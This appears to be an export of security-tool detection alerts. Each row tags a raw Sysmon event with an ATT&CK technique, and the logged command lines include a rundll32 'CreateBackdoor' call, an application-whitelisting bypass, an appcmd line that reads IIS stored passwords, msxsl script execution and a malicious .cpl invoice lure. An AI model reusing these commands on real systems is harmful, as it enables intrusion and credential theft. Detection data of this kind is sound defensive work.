<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-03-21T05:00:25.189133Z"">
</TimeCreated>
<EventRecordID>243532</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2860"" ThreadID=""3508"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-03-21 05:00:24.985</Data>
<Data Name=""ProcessGuid"">747F3D96-9F68-5E75-0000-001079652000</Data>
<Data Name=""ProcessId"">3300</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
<Data Name=""CommandLine"">rundll32 windowscoredeviceinfo.dll,CreateBackdoor</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">747F3D96-9DBA-5E75-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
<Data Name=""ParentProcessGuid"">747F3D96-9DBC-5E75-0000-00102C390100</Data>
<Data Name=""ParentProcessId"">1652</Data>
<Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1085] Rundll32 Execution detected,1584766825.192553,2020-03-21T09:00:25.192553+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-03-21T05:00:25.189133Z"">
</TimeCreated>
<EventRecordID>243532</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2860"" ThreadID=""3508"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-03-21 05:00:24.985</Data>
<Data Name=""ProcessGuid"">747F3D96-9F68-5E75-0000-001079652000</Data>
<Data Name=""ProcessId"">3300</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
<Data Name=""CommandLine"">rundll32 windowscoredeviceinfo.dll,CreateBackdoor</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">747F3D96-9DBA-5E75-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
<Data Name=""ParentProcessGuid"">747F3D96-9DBC-5E75-0000-00102C390100</Data>
<Data Name=""ParentProcessId"">1652</Data>
<Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1117] Bypassing Application Whitelisting,1557668039.743077,2019-05-12T17:33:59.743077+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32.exe url.dll,FileProtocolHandler calc.exe)",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-12T13:33:37.078801Z"">
</TimeCreated>
<EventRecordID>16391</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2032"" ThreadID=""1996"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-12 13:33:37.063</Data>
<Data Name=""ProcessGuid"">365ABB72-20B1-5CD8-0000-001064D62400</Data>
<Data Name=""ProcessId"">1844</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">rundll32.exe url.dll,FileProtocolHandler calc.exe</Data>
<Data Name=""CurrentDirectory"">c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-1596-5CD8-0000-0020103A0100</Data>
<Data Name=""LogonId"">0x13a10</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238</Data>
<Data Name=""ParentProcessGuid"">365ABB72-2006-5CD8-0000-0010E0912300</Data>
<Data Name=""ParentProcessId"">2936</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; </Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1557668039.743077,2019-05-12T17:33:59.743077+04:00,,Threat,High,"Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32.exe url.dll,FileProtocolHandler calc.exe )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-12T13:33:37.078801Z"">
</TimeCreated>
<EventRecordID>16391</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2032"" ThreadID=""1996"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-12 13:33:37.063</Data>
<Data Name=""ProcessGuid"">365ABB72-20B1-5CD8-0000-001064D62400</Data>
<Data Name=""ProcessId"">1844</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">rundll32.exe url.dll,FileProtocolHandler calc.exe</Data>
<Data Name=""CurrentDirectory"">c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-1596-5CD8-0000-0020103A0100</Data>
<Data Name=""LogonId"">0x13a10</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238</Data>
<Data Name=""ParentProcessGuid"">365ABB72-2006-5CD8-0000-0010E0912300</Data>
<Data Name=""ParentProcessId"">2936</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; </Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1085] Rundll32 Execution detected,1557668039.743077,2019-05-12T17:33:59.743077+04:00,,Threat,High,"Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32.exe url.dll,FileProtocolHandler calc.exe )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-12T13:33:37.078801Z"">
</TimeCreated>
<EventRecordID>16391</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2032"" ThreadID=""1996"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-12 13:33:37.063</Data>
<Data Name=""ProcessGuid"">365ABB72-20B1-5CD8-0000-001064D62400</Data>
<Data Name=""ProcessId"">1844</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">rundll32.exe url.dll,FileProtocolHandler calc.exe</Data>
<Data Name=""CurrentDirectory"">c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-1596-5CD8-0000-0020103A0100</Data>
<Data Name=""LogonId"">0x13a10</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238</Data>
<Data Name=""ParentProcessGuid"">365ABB72-2006-5CD8-0000-0010E0912300</Data>
<Data Name=""ParentProcessId"">2936</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; </Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1558920558.973148,2019-05-27T05:29:18.973148+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( &quot;C:\Windows\System32\inetsrv\appcmd.exe&quot; list vdir &quot;ERROR ( message:Configuration error &quot; /text:password ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-27T01:29:18.973148Z"">
</TimeCreated>
<EventRecordID>5943</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""324"" ThreadID=""2260"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-27 01:29:18.933</Data>
<Data Name=""ProcessGuid"">365ABB72-3D6E-5CEB-0000-0010EFADFF00</Data>
<Data Name=""ProcessId"">2276</Data>
<Data Name=""Image"">C:\Windows\System32\inetsrv\appcmd.exe</Data>
<Data Name=""FileVersion"">7.5.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Application Server Command Line Admin Tool</Data>
<Data Name=""Product"">Internet Information Services</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\inetsrv\appcmd.exe&quot; list vdir &quot;ERROR ( message:Configuration error &quot; /text:password</Data>
<Data Name=""CurrentDirectory"">C:\Windows\Temp\</Data>
<Data Name=""User"">IIS APPPOOL\DefaultAppPool</Data>
<Data Name=""LogonGuid"">365ABB72-B26B-5CEA-0000-002023240800</Data>
<Data Name=""LogonId"">0x82423</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45</Data>
<Data Name=""ParentProcessGuid"">365ABB72-3D4A-5CEB-0000-0010FA93FD00</Data>
<Data Name=""ParentProcessId"">2584</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&quot; -nop -noni -enc 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</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1558969968.76308,2019-05-27T19:12:48.763080+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /c vssadmin List Shadows| find &quot;Shadow Copy Volume&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-27T15:12:48.655114Z"">
</TimeCreated>
<EventRecordID>6184</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""980"" ThreadID=""2220"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-27 15:12:48.644</Data>
<Data Name=""ProcessGuid"">365ABB72-FE70-5CEB-0000-0010385C0C00</Data>
<Data Name=""ProcessId"">2412</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">cmd.exe /c vssadmin List Shadows| find &quot;Shadow Copy Volume&quot; </Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">365ABB72-7B40-5CEC-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
<Data Name=""ParentProcessGuid"">365ABB72-FD85-5CEB-0000-00104C0E0B00</Data>
<Data Name=""ParentProcessId"">1944</Data>
<Data Name=""ParentImage"">C:\Windows\System32\notepad.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\notepad.exe&quot;</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
Prohibited Process connecting to internet,1564436001.567754,2019-07-30T01:33:21.567754+04:00,,Threat,Critical,"User (MSEDGEWIN10\IEUser) ran process C:\Windows\System32\mshta.exe and initiated a network connection from hostname ( MSEDGEWIN10.home ) and IP ( 10.0.2.15 ) to hostname ( ) , IP ( 93.184.220.29 ) and port ( 80 )",3,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>3</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>3</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-29T21:33:20.711201Z"">
</TimeCreated>
<EventRecordID>4908</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2640"" ThreadID=""3496"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName"">Suspicious NetCon</Data>
<Data Name=""UtcTime"">2019-07-29 21:33:19.687</Data>
<Data Name=""ProcessGuid"">747F3D96-661E-5D3F-0000-00107F248700</Data>
<Data Name=""ProcessId"">3164</Data>
<Data Name=""Image"">C:\Windows\System32\mshta.exe</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""Protocol"">tcp</Data>
<Data Name=""Initiated"">true</Data>
<Data Name=""SourceIsIpv6"">false</Data>
<Data Name=""SourceIp"">10.0.2.15</Data>
<Data Name=""SourceHostname"">MSEDGEWIN10.home</Data>
<Data Name=""SourcePort"">49827</Data>
<Data Name=""SourcePortName""></Data>
<Data Name=""DestinationIsIpv6"">false</Data>
<Data Name=""DestinationIp"">93.184.220.29</Data>
<Data Name=""DestinationHostname""></Data>
<Data Name=""DestinationPort"">80</Data>
<Data Name=""DestinationPortName"">http</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1117] Bypassing Application Whitelisting,1564434679.098105,2019-07-30T01:11:19.098105+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( &quot;C:\Windows\system32\rundll32.exe&quot; Shell32.dll,Control_RunDLL &quot;C:\Users\IEUser\Downloads\Invoice@0582.cpl&quot;,)",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-29T21:11:17.587732Z"">
</TimeCreated>
<EventRecordID>4863</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2640"" ThreadID=""3476"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-29 21:11:17.445</Data>
<Data Name=""ProcessGuid"">747F3D96-60F5-5D3F-0000-0010D1CF5500</Data>
<Data Name=""ProcessId"">4356</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\rundll32.exe&quot; Shell32.dll,Control_RunDLL &quot;C:\Users\IEUser\Downloads\Invoice@0582.cpl&quot;,</Data>
<Data Name=""CurrentDirectory"">C:\Users\IEUser\Downloads\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-0020B5314100</Data>
<Data Name=""LogonId"">0x4131b5</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">Medium</Data>
<Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
<Data Name=""ParentProcessGuid"">747F3D96-60F5-5D3F-0000-0010A7B65500</Data>
<Data Name=""ParentProcessId"">4996</Data>
<Data Name=""ParentImage"">C:\Windows\System32\control.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\control.exe&quot; &quot;C:\Users\IEUser\Downloads\Invoice@0582.cpl&quot;,</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1127] Trusted Developer Utilities,1558632368.94719,2019-05-23T21:26:08.947190+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( \\vboxsrv\HTools\msxsl.exe ) through command line ( msxsl.exe c:\Users\IEUser\AppData\Roaming\Adobe\test.dat c:\Users\IEUser\AppData\Roaming\Adobe\test.dat) ,1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-23T17:26:08.716859Z"">
</TimeCreated>
<EventRecordID>1017</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2032"" ThreadID=""2092"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-23 17:26:08.686</Data>
<Data Name=""ProcessGuid"">365ABB72-D7B0-5CE6-0000-001077C56D00</Data>
<Data Name=""ProcessId"">3388</Data>
<Data Name=""Image"">\\vboxsrv\HTools\msxsl.exe</Data>
<Data Name=""FileVersion"">1.1.0.1</Data>
<Data Name=""Description"">msxsl</Data>
<Data Name=""Product"">Command Line XSLT</Data>
<Data Name=""Company"">Microsoft</Data>
<Data Name=""CommandLine"">msxsl.exe c:\Users\IEUser\AppData\Roaming\Adobe\test.dat c:\Users\IEUser\AppData\Roaming\Adobe\test.dat</Data>
<Data Name=""CurrentDirectory"">D:\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-CE6C-5CE6-0000-002047F30000</Data>
<Data Name=""LogonId"">0xf347</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8B516E7BE14172E49085C4234C9A53C6EB490A45,MD5=3E9F31B4E2CD423C015D34D63047685E,SHA256=35BA7624F586086F32A01459FCC0AB755B01B49D571618AF456AA49E593734C7,IMPHASH=2477F6A819520981112AD254E2BD87D8</Data>
<Data Name=""ParentProcessGuid"">365ABB72-D2D4-5CE6-0000-001047EA6400</Data>
<Data Name=""ParentProcessId"">2236</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\cmd.exe&quot; </Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1599760127.156198,2020-09-10T21:48:47.156198+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( c:\windows\system32\cmd.exe ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-09-10T17:48:47.077612Z"">
</TimeCreated>
<EventRecordID>380456</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3312"" ThreadID=""3928"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName"">-</Data>
<Data Name=""UtcTime"">2020-09-10 17:48:39.678</Data>
<Data Name=""ProcessGuid"">747F3D96-66F7-5F5A-0500-00000000F600</Data>
<Data Name=""ProcessId"">388</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.592 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">Cmd.Exe</Data>
<Data Name=""CommandLine"">c:\windows\system32\cmd.exe</Data>
<Data Name=""CurrentDirectory"">c:\windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">747F3D96-66F8-5F5A-E703-000000000000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-66F4-5F5A-0300-00000000F600</Data>
<Data Name=""ParentProcessId"">300</Data>
<Data Name=""ParentImage"">C:\Windows\System32\smss.exe</Data>
<Data Name=""ParentCommandLine"">\SystemRoot\System32\smss.exe</Data>
</EventData>
